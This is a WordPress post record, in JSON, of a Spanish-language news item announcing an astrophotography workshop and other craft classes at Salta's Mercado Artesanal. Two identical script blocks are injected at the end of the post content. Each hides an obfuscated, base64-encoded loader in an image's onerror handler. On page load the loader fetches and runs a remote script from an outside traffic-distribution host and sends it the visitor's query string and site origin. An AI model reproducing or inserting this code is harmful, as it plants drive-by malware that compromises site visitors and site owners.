{"id":1676,"date":"2022-10-25T12:08:32","date_gmt":"2022-10-25T15:08:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1676"},"modified":"2025-08-14T00:32:14","modified_gmt":"2025-08-14T03:32:14","slug":"el-mercado-artesanal-de-salta-brindara-un-taller-de-astrofotografia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1676","title":{"rendered":"El Mercado Artesanal de Salta brindar\u00e1 un taller de astrofotograf\u00eda"},"content":{"rendered":"\n<h5 class=\"has-cyan-bluish-gray-color has-black-background-color has-text-color has-background wp-block-heading\"><em>El curso dar\u00e1 inicio el 3 de noviembre y se capacitar\u00e1 a los participantes en la astronom\u00eda, el reconocimiento del cielo nocturno, el uso de telescopios y la fotograf\u00eda astron\u00f3mica mediante diferentes dispositivos.<\/em><\/h5>\n\n\n\n<p>Con la intenci\u00f3n de acercar herramientas, desarrollar y potenciar las habilidades personales de los participantes, el&nbsp;<strong>Mercado Artesanal&nbsp;<\/strong>dependiente de la Secretar\u00eda de Cultura de la Provincia ofrecer\u00e1 un Taller de Astrofotograf\u00eda a cargo del profesionales&nbsp;Emiliano Arranz Rivero.<\/p>\n\n\n\n<p>El curso est\u00e1 destinado a personas con conocimientos en el uso de c\u00e1mara r\u00e9flex o de control manual y manejo de programas de edici\u00f3n de imagen, preferentemente Adobe Photoshop. De todas maneras, no es excluyente para el cursado.<\/p>\n\n\n\n<p>El taller dar\u00e1 inicio el jueves 3 de noviembre de 18:30 a las 21 horas. La modalidad es te\u00f3rica-pr\u00e1ctica, con una duraci\u00f3n de 2 meses el primer m\u00f3dulo y un arancel mensual de $3500. Materiales necesarios: C\u00e1mara r\u00e9flex o de control manual, celulares y cuaderno.<\/p>\n\n\n\n<p>Los interesados podr\u00e1n inscribirse a trav\u00e9s de Instagram @escuela_foto_eaar_salta o @astroclub_salta Para mayor informaci\u00f3n comunicarse al (387) 4087661.<\/p>\n\n\n\n<p>Las clases se desarrollar\u00e1n en el Taller Arq. Orlando Vilari\u00f1o del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555.<\/p>\n\n\n\n<p><strong>Tambi\u00e9n se encuentran vigentes los siguientes talleres:<\/strong><\/p>\n\n\n\n<p><strong>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de fabricaci\u00f3n de juegos did\u00e1cticos<\/strong><\/p>\n\n\n\n<p>Prof. Rub\u00e9n Guti\u00e9rrez<\/p>\n\n\n\n<p>Jueves de 15 a 17 horas<\/p>\n\n\n\n<p>Inversi\u00f3n mensual: $2500<\/p>\n\n\n\n<p>Contacto: (387) 5332512<\/p>\n\n\n\n<p><strong>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de construcci\u00f3n de puff<\/strong><\/p>\n\n\n\n<p>Prof. Jorge Ramos<\/p>\n\n\n\n<p>Viernes de 17 a 19 horas<\/p>\n\n\n\n<p>Inversi\u00f3n mensual: $3000<\/p>\n\n\n\n<p>Contacto: (387) 4643115<\/p>\n\n\n\n<p><strong>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de cer\u00e1mica&nbsp;<\/strong><\/p>\n\n\n\n<p>Prof. Lorena Ayala<\/p>\n\n\n\n<p>Viernes de 15 a 17 horas<\/p>\n\n\n\n<p>Inversi\u00f3n mensual: $2500<\/p>\n\n\n\n<p>Contacto: (387) 3568176<\/p>\n\n\n\n<p><strong>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de tejido en telar<\/strong><\/p>\n\n\n\n<p>Prof. Beatriz Aguilera<\/p>\n\n\n\n<p>Mi\u00e9rcoles de 15 a 17 horas<\/p>\n\n\n\n<p>Inversi\u00f3n mensual: $2500<\/p>\n\n\n\n<p>Contacto: (387) 4461258<\/p>\n\n\n\n<p><strong>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de bordado<\/strong><\/p>\n\n\n\n<p>Prof. Paula Esp\u00edn<\/p>\n\n\n\n<p>Mi\u00e9rcoles de 16 a 18 horas<\/p>\n\n\n\n<p>Contacto: (387) 4813546<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mercado-artesanal-de-salta-brindara-un-taller-de-astrofotografia-85699\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El curso dar\u00e1 inicio el 3 de noviembre y se capacitar\u00e1 a los participantes en la astronom\u00eda, el reconocimiento del cielo nocturno, el uso de telescopios y la fotograf\u00eda astron\u00f3mica mediante diferentes dispositivos. Con la intenci\u00f3n de acercar herramientas, desarrollar y potenciar las habilidades personales de los participantes, el&nbsp;Mercado Artesanal&nbsp;dependiente de la Secretar\u00eda de Cultura [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1677,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-1676","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1676"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1676"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1676\/revisions"}],"predecessor-version":[{"id":7304,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1676\/revisions\/7304"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1677"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1676"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}